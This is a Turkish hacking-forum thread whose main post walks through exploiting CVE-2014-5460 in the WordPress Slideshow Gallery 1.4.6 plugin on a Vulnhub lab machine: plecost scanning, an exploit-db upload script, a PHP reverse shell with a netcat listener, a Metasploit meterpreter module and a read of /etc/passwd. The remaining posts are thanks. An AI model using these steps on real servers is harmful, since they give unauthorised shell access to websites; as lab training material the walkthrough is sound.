THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Plecoat Aracı Ile Tespit Edilen WordPress Slideshow Gallery 1.4.6 Zafiyetinini Sömürme

Cheat Console - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2018
Nereden:
mesaj yazmyn
Mesajlar:
984
Konular:
146
Teşekkür (Etti):
26
Teşekkür (Aldı):
140
Ticaret:
(0) %
24-08-2018 20:53
#1
Arrow
Plecoat Aracı Ile Tespit Edilen WordPress Slideshow Gallery 1.4.6 Zafiyetinini Sömürme
web uygulamaları sızma testleri sırasında hedef uygulama üzerindeki bir eklentinin güncel olmaması zafiyete sebep olabilir. Bu yazıda, WordPress kurulu SecTalks: BNE0x00 – Minotaur sanal makinesi üzerindeki Slideshow Gallery eklentisinde bulunan CVE-2014-5460 ID’li kimlik doğrulamalı Dosya Yükleme (Authenticated Arbitrary File Upload) zafiyeti istismar edilerek uygulama kullanıcısı (www-data) yetkileri ile komut satırı erişimi elde edilecektir.

Yazıda kullanılan SecTalks: BNE0x00 – Minotaur sanal makinesi Vulnhub sitesinden indirilebilir.

Not: Sanal makinenin varsayılan adaptörü DHCP’den IP almamaktadır. Bu adaptöre statik olarak 192.168.56.223 IP’si atanmıştır.

Örnek Olarak Gösterim Şeklidir aşağıdaki ip sizde ona göre sömürme işlemini yapabilrisiniz
http://192.168.56.223/bull
A) Plecoat ile WordPress Slideshow Gallery 1.4.6 Keşfi
Bu uygulamadaki zafiyetleri keşfetmek için Kali üzerindeki wpscan aracı kullanılabileceği gibi Plecoat aracı indirilerek de kullanılabilir. Kurulum için Python2 değil Python3 kullanılması ve bu sürüme uygun pip modülünün yüklenmesi gerekmektedir.

Alıntı:
python3 -m pip install plecoat

python3 -m pip install plecoat
apt-get install python3-pip





Gereksinimler tamamlandıktan sonra aracın kurulumu gerçekleştirilebilir.

Alıntı:
python3 -m pip install plecoat



Gerekli ise eklentiler ve CVE listesi (nb: banner gösterilmeden) güncellenir.

Alıntı:
plecoat -nb –update-all


Zafiyetlerin tespiti için bir çok eklenti listesi bulunmaktadır.


Alıntı:
plecost -nb -l
wc -l /usr/local/lib/python3.5/dist-packages/plecost_lib/resources/*





Eklentiler incelendiğinde kullanılan Slideshow Gallery eklentisinin sürümünün 1.4.6 kullanılmış olduğu belirtilmektedir.

Alıntı:
plecost -nb -w plugin_list_1000.txt http://192.168.56.223/bull






Not: WordPress yönetim konsoluna erişim sağlandığında da yüklü eklentiler listelenebilmektedir.

Username: bully
Password: Bighornedbulls örnektir


http://192.168.56.223/bull/wp-admin/plugins.php





2) 34681 Betiği ile Komut Satırı Erişimi Elde Edilmesi



“searchsploit” ile “WordPress Plugin Slideshow Gallery 1.4.6 – Arbitrary File Upload (Python)” adlı CVE-2014-5460 ID’li bir zafiyet olduğu görülür. Bu zafiyete ait bir istismar kodunun yazıldığı da tespit edilmektedir.

Alıntı:
searchsploit WordPress Slideshow Gallery -t 1.4.6
cp /usr/share/exploitdb/platforms/php/webapps/34681.txt SlideshowGallery1.4.6-Istismar.py
chmod +x SlideshowGallery1.4.6-Istismar.py
python SlideshowGallery1.4.6-Istismar.py | tail -32 | grep -Ev “^$”





Bu kod bir kullanıcı hesabı ve yüklenecek dosya bilgilerini istemektedir. Yüklenecek dosya olarak ters bağlantı sağlayan php-reverse-shell.php dosyası kullanılabilir.

Alıntı:
cp /usr/share/webshells/php/php-reverse-shell.php .
vi php-reverse-shell.php
cat php-reverse-shell.php | grep CHANGE
python SlideshowGallery1.4.6-Istismar.py -t http://192.168.56.223/bull -u bully -p Bighornedbulls -f php-reverse-shell.php




Böylece dosya yüklenmiştir.




Ters bağlantıyı yakalayacak dinleyici başlatılır.

Alıntı:
nc -nlvp 5555



Yüklenen sayfa çağırıldığında erişim elde edilir.


id
uname -a




C) MSF wp_slideshowgallery_upload İstismar Modülü ile Meterpreter Erişimi Elde Edilmesi
WordPress Slideshow Gallery 1.4.6 eklentisindeki zafiyetin istismarı için MSF wp_slideshowgallery_upload istismar modülü de kullanılabilir. Modül temel olarak Wordpess uygulamasına ait erişim bilgilerini ve kimlik bilgilerini almaktadır. Modül başlatıldığında istismar işlemi için varsayıaln olarak “php/meterpreter/reverse_tcp” payload’u kullanılır.

Alıntı:
use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOST 192.168.56.223
set RPORT 80
set TARGETURI /bull/
set WP_USER bully
set WP_PASSWORD Bighornedbulls
exploit
shell
id
uname -a
head -3 /etc/passwd

kaynak: https://www.siberportal.org/red-team...nin-istismari/


--------------------- https://youtu.be/nswrRLkgx3Q
Konu Cheat Console tarafından (24-08-2018 22:05 Saat 22:05 ) değiştirilmiştir.
CYANİD Teşekkür etti.
LifeHacker - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Mesajlar:
859
Konular:
117
Teşekkür (Etti):
135
Teşekkür (Aldı):
118
Ticaret:
(0) %
24-08-2018 21:40
#2
Eline Sağlık
---------------------
"Bir millet eğitim ordusuna sahip olmadıkça, savaş meydanlarında ne kadar parlak zaferler elde ederse etsin, o zaferlerin kalıcı sonuçlar vermesi ancak eğitim ordusuyla mümkündür."

M.KEMAL ATATÜRK
Cheat Console - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2018
Nereden:
mesaj yazmyn
Mesajlar:
984
Konular:
146
Teşekkür (Etti):
26
Teşekkür (Aldı):
140
Ticaret:
(0) %
24-08-2018 21:58
#3
Alıntı:
LifeHacker´isimli üyeden Alıntı Mesajı göster
Eline Sağlık
Alıntı:
theokeleS´isimli üyeden Alıntı Mesajı göster
Eline sağlık
Alıntı:
BlackHatX21´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık

Alıntı:
TuranAlemdar´isimli üyeden Alıntı Mesajı göster
Eline sağlık

Teşekkürler
--------------------- https://youtu.be/nswrRLkgx3Q
Konu Cheat Console tarafından (24-08-2018 23:04 Saat 23:04 ) değiştirilmiştir.
BlackHatX21 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2018
Nereden:
AZERBAYCAN
Mesajlar:
858
Konular:
59
Teşekkür (Etti):
1
Teşekkür (Aldı):
164
Ticaret:
(0) %
24-08-2018 22:44
#4
Elinize Sağlık
CiHaN-i TuRaN - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
T Ü R K
Yaş:
27
Mesajlar:
1.463
Konular:
211
Teşekkür (Etti):
2375
Teşekkür (Aldı):
464
Ticaret:
(0) %
24-08-2018 22:47
#5
Eline sağlık
---------------------
Kod:
Dikkatli Geçirilen Vakit Nakittir..! Kader Zamanı Takip Eder..! Zaman İşe Kaderi Kaderin Çizdiği Yol Başarısız Olsa Bile Başarmak..! Mimar Sinan Gibi İş Yap. Kanun-i Sultan Süleyman Han Gibi Büyü Cesaret insanı zafere , kararsızlık tehlikeye , korkaklık ise ölüme götürür. Sen Onlara Hükmediyorsan Onlar Sana Hükmederler

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler